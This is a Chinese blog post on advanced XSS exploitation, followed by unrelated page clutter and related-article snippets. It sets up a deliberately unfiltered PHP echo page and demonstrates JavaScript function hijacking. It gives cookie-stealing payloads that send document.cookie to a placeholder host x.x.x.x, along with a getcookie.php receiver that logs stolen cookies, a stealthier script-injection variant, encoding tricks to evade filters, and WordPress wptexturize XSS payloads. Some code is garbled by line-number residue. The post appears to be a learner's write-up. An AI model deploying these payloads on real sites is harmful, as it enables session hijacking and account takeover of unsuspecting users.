ajax在Xss中的利用,XSS高级利用

最新推荐文章于 2024-05-03 18:01:49 发布
最新推荐文章于 2024-05-03 18:01:49 发布
阅读量5.7k 收藏
点赞数
文章标签: ajax在Xss中的利用

点击阅读

利用 xss 的 javascript 劫持

一个 xss 漏洞示例页面

1

2

3

4

5

6

7

8

9

10

$xss = @$_GET['xss'];

if($xss!==null){

echo $xss;

}

?>

这段代码中首先包含一个表单,用于向页面自己发送 GET 请求,带一个名为 xss 的参数。 然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果 xss 中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素

例如

1

2

3

4

5

6

7

8

9

10

Javascript Hijack with XSS

script.js 内容为

1

2

3

4

function Hello()

{

alert("hi");

}

当传入 xss 为

xss=function Hello() { alert("hacked"); } 时

鼠标点击会弹出 hacked 而非预定的 hi

这里利用 xss 漏洞劫持 javascript 代码

可以传入以执行较长的代码

XSS 会话劫持

可以在含 xss 漏洞的地方使用以下类似代码盗取 cookie

window.open("http://x.x.x.x/getcookie.php?cookie="+document.cookie)

document.location="http://x.x.x.x/getcookie.php?cookie="+document.cookie;

getcookie.php:

1

2

3

4

5

$cookie=@$_GET['cookie'];

$path="./cookies.txt";

file_put_contents($path,$cookie.PHP_EOL, FILE_APPEND);

?>

为防止察觉,使用 javascript

script.js:

1

2

3

var script =document.createElement('script');

script.src='http://x.x.x.x/getcookie.php?cookie='+escape(document.cookie);

document.body.appendChild(script);

f788839df4ea2d6911ad65d1d1b6cc15.png

xss 常用的编码

bWAPP 中的 XSS - Reflected (AJAX/XML)

输入 <img src=1 οnerrοr="alert(document.cookie)">

弹窗获取 cookie

<、>分别为的 HTML tag

第一个,html 实体编码,例如:

alert()

第二个,进制类,例如:

x61x6cx65x72x74x60x78x73x73x60

某些时候,也有不带 x,例如:5c6a

第三个,Unicode,例如:

u0061u006cu0065u0072u0074u0060u4e2du6587u4e5fu53efu4ee5u0060

第四个,纯转义,例如:

' " < >

这样的在特殊字符前加进行转义。

html 标签中:

1

2

3

4

5

html中当然会支持html实体编码,例如=,也有<

支持十六进制,但是要以开头,其中x大写小写无所谓。

支持十进制,要以开头,注意,没有x哦。

支持数字部分高位补充0,例如=,=这两是一样的。

可能你已经发现了,后缀有没有; 都无所谓

javascript 中:

1

2

3

eval函数里,支持十六进制,但是要以 x 开头,x只能小写!必须两位,例如:x5c

eval函数里,支持八进制,但是要以 开头。必须两位,例如:134

eval函数里,还支持u前缀的unicode,本质是:16进制的ascii码。必须是四位,例如:u005c

WordPress XSS 漏洞

于是下载了 wordpress-3.8.3 在虚拟机测试

9dce2ef70cd8b659228c8fcc8977de25.png

发现管理员登陆时,编辑内容并不会被过滤

编辑文章,回到首页查看

2ca2082191a342b27dd88966d89556b6.png

但是 chrome 下弹出的 cookie 似乎被过滤了,最关键的部分并没有,利用 js 在服务器上获取的 cookie 同样不完整

firefox 下却没问题

8f281e50abbbc6287d8908e68b3ad024.png

以下两个地方都被插入了代码,也会弹出两次

标题

61a506ddc5dc7bb90064764e5d95e714.png

侧栏

a40955998903952c7d244f50d4c65c0d.png

去官网下了个最新版 WordPress

ccdebd2c6548db52668949a908c2a383.png

管理员的编辑仍不会被过滤

接收到 cookie

3c0efe6a37cf3b4ff023cc251e641bb7.png

wordpress 站点有多个用户,当不是管理员时

漏洞的成因是在/wp-includes/formatting.php 中的 wptexturize 函数

formatting.php 应该是用于清理 XHTML 和用特定字符集正确格式化文本

1

2

3

4

5

6

7

8

9

10

11

12

13

function wptexturize($text) {

......

$textarr = preg_split('/(<.>|[.*])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);

foreach ( $textarr as &$curl ) {

......

}

return implode( '', $textarr );

}

这里的正则/(<.>|[.*])/Us会匹配

1

2

3

4

5

6

7

//这个新姿势能在前台xss弹窗 不限制用户权限 后台的确不能弹窗

[["][a>alert(1)]

前后台都能弹窗 似乎还是老的onmouseover能用

[[" NOT VULNERABLE]

然而我发现这 payload 没什么效果,有时间再好好看看,完善一下

39726e7de0b960991fd2b42e4ae6dfcd.png

a9f078372efb1d4fe3614e6b53fe1e1f.png

17df2460794fe472c0b3359564c759e4.png

asta谢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AJAX-
Koite的博客
03-10 258
AJAX简介 AJAX全称为Asynchronous JavaScript And XML,就是异步的JS和XML 是一种在无需重新加载整个网页的情况下,能够更新部分页面内容的新方法 通过ajax可以在浏览器向服务器发送异步请求,最大的优势:无刷新获取数据 ajax不是新的编程语言,而是一种将现有的标准组合在一起使用的新方式 XML简介 XML:可扩展标记语言。被设计用来传输和存储数据 XML和HTML类似,不同的是HTML都是预定义标签,XML没有预定义标签,全都是自定义标签,用来表示
ASP.NET Core如何利用Csp标头对抗Xss攻击
10-16
在ASP.NET CoreXSS(跨站脚本)攻击是一种常见的安全威胁,它允许攻击者在用户浏览器执行恶意脚本。为了对抗这种威胁,开发者可以利用Content Security Policy(CSP)标头,这是一种安全机制,用于规定网页上...
Ajax XSS样例
09-18
新浪此前遭遇的XSS攻击的实现源码,有兴趣可以研读一下
XSS——Ajax
王嘟嘟的博客
09-21 2263
0x00 前言 其实我在之前学习的时候,觉得Ajax离我还是有一段距离的,但是现在系统的学习xss的时候,发现其实Ajax是一个web发展出现的必然产物。 0x01 学习笔记 1.什么是AjaxAjax就是指“异步的JavaScript和xml”。由JavaScript,css,xml,DMO加上XMLHttpRequest构成的。 其实这里还有一个疑问就是关于XMLHttpRequest这...
2024年网安最新新来的妹纸问我 AJAX 请求为什么不安全?没有回答出来。。。
最新发布
2301_82257383的博客
05-03 725
最后说下,几种常见的CSRF防御手段:1. 验证HTTP Referer字段(非常简单,但是鉴于客户端并不可信任,所以并不是很安全)(防止CSRF,检查Referer字段简单直接,但是其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其Referer字段的可能。2. 在请求地址添加token并验证。
Web编程 Ajax,跨域,XSS攻击
weixin_46131409的博客
06-25 1176
一.Ajax(Asynchronous Javascript And XML;异步JS与XML) 1.简介: 即使用JS与Server进行异步交互,传输XML数据(不过不一定是XML,现在JSON用的更多) 同步交互:发送1个请求,就要等待Server的响应结束,然后才能发送第2请求 异步交互:发送1个请求后,无需等待Server响应,就可以发送第2个请求 特点: 1.使用JS向Server发送异步请求 2.浏览器页面局部刷新 场景示例:见下图 2.基于JQuery的Ajax实现 <butt
ajax全局防xss,在Ajax接收的数据上的JavaScript防止XSS
weixin_36467693的博客
08-05 1422
我从数据库接收数据,然后使用jQuery ajax将结果添加到HTML元素,如下所示:$.ajax({url: "getDatabaseData.php",type: "post",dataType: "json",success: function(response){$("#message-div").html(response[0].user_input_message);}});这是从数...
xss过滤器无法处理ajax请求_原创 | 记一次失效的XSS过滤器修复
weixin_39677870的博客
12-08 707
点击上方蓝字关注我们奇怪的XSS过滤器一般在实际Web开发,我们常常需要过滤/编码页面传递给后台的特殊字符,防止xss跨站脚本攻击。使用过滤器Filter可以很好的完成这个功能。前段时间某项目的研发使用过滤器进行XSS过滤后,进行复测,发现一个奇怪的现象,原本网站全局的xss,变成了只有部分接口存在xss。一开始以为过滤器的匹配接口路径存在问题,查看代码发现开发是通过写HttpServ...
AJAX请求真的不安全么?谈谈Web安全与AJAX的关系。
s44359487yad的博客
01-05 191
开篇三问 AJAX请求真的不安全么? AJAX请求哪里不安全? 怎么样让AJAX请求更安全? 前言 本文包含的内容较多,包括AJAX,CORS,XSS,CSRF等内容,要完整的看完并理解需要付出一定的时间。 另外,见解有限,如有描述不当之处,请帮忙及时指出。 正文开始… 从入坑前端开始,一直到现在,AJAX请求都是以极高的频率重复出现,也解决过不少AJAX遇到的问题,如跨域调试,...
商业编程-源码-利用Ajax进行数据分页的源码例子.zip
06-23
5. **安全与性能考虑**:在实际应用,需考虑安全性问题,比如防止跨站脚本攻击(XSS)和跨站请求伪造(CSRF)。同时,优化Ajax请求的频率和数据传输量,避免过多请求导致服务器压力过大。 6. **库与框架的支持**:...
WordPress利用AJAX技术进行评论提交的实现示例
09-02
本文将详细介绍如何在WordPress利用AJAX实现评论提交,并重点讲解关键函数`ajax_comment`。 首先,为了实现AJAX评论提交,我们需要在主题的`functions.php`文件添加PHP代码。这部分代码主要负责处理AJAX请求,...
XSStrike好用的xss扫描
08-23
1. **智能检测**:XSStrike利用先进的算法来分析目标应用程序的输入和输出,识别可能的XSS入口点,并生成相关的payload进行测试。 2. **模糊测试**:工具内置了丰富的XSS payload库,可以对目标进行大量的模糊测试...
xss过滤器无法处理ajax请求_Web安全实践:XSS(2)
weixin_39856265的博客
11-22 860
上次课我们介绍了XSS的基本原理,演示了偷到别人的Cookie。这一节,我们进一步讨论XSS,并且在Ajax的帮助下,完成一个XSS蠕虫。蠕虫的特点是它具有传播性,也即被攻击者除了被攻击之外,自己也会被传染,从而帮助传播攻击。一个著名的XSS蠕虫(也是世界上第一个XSS蠕虫?)的例子是MySpace的Samy Worm,创造了24小时传染百万用户的光辉战绩。Ajax是啥呢? Ajax的全称是Asy...
xss过滤器无法处理ajax请求_信息安全XSS的危害
weixin_39934257的博客
11-30 401
通过 XSS 攻击,黑客能做什么?我们知道,这 3 种 XSS 攻击,都是因为黑客在用户的浏览器执行了恶意的 JavaScript 脚本。那么执行这些 JavaScript 脚本有什么样的危害呢?我把这些危害总结了一下,可以分为下面几种。1. 窃取 Cookie从上面的例子,我们可以看到,黑客可以窃取用户的 Cookie。因为黑客注入的 JavaScript 代码是运行在 http://ser...
ajaxXss利用,Ajax Web应用程序的XSS漏洞检测
weixin_32602879的博客
08-06 8375
摘要:Web2.0已成为目前网络上的热点技术,作为其核心技术的Ajax给用户带来了无刷新的网络快速浏览新体验。但是,临界于桌面应用程序的“胖客服端”与Web应用程序的“瘦客户端”机制,Ajax技术的使用造成web应用程序同时具备这两种客户端特点的安全威胁。一方面Ajax将部分逻辑转嫁到客户端相应的暴露程序的部分业务逻辑;另一方面与Web服务器的交互信息以及可能的匿名访问也存在着潜在的攻击利用价值。...
xss过滤器无法处理ajax请求_2. 萌新向 | XSS之隐秘的角落
weixin_39597318的博客
11-21 212
XSS漏洞主要是对表单发起攻击,很多时候,表单会以输入框的形式出现,但也有些表单不会以输入框的形式出现,甚至不会让我们看见,而是藏在某个不起眼的小地方,这就是所谓的“隐秘的角落”。本文将继续从实战讲解XSS,仍然使用前文所用的XSS Challenge平台——为你揭秘如何处理那些“隐秘的角落”。当然,除此之外,我们也会带来一些新的东西,比如——BurpSuite。上一篇文章的末尾已经使用过了Bu...
XSS高级利用:盗取用户Cookie
Zeker62的博客
08-13 1167
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
ajax form 序列化 复习 Xss攻击
weixin_42100915的博客
06-30 393
    1.ajax参数                url:        type:        data:            1. value不能是字典 {k1:'v1',k2:[1,2,3,],k3: JSON.stringify({})}            2. $('').serilizer()        dataType:"JSON",# text,html,xml ...
XSS之存储型xss获取cookie试验(ajax方法)
qq_34847808的博客
06-13 4359
1、首先我写了个非常简易的留言板,没有做人任何安全处理,能使用存储型xss2、留言里写入能够发送请求的js代码,提交后服务器将代码存储到服务器,用户访问的时候就会触发这段xss代码。让访问这个页面的用户能够发送一个请求并附带自己的cookie信息。3、第二步请求的目标主机上放置一个脚本用来接收这个请求然后保存在文本具体步骤:一、登录我写的留言板,留言写入xss代码提交后页面显示如下:内容被被保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值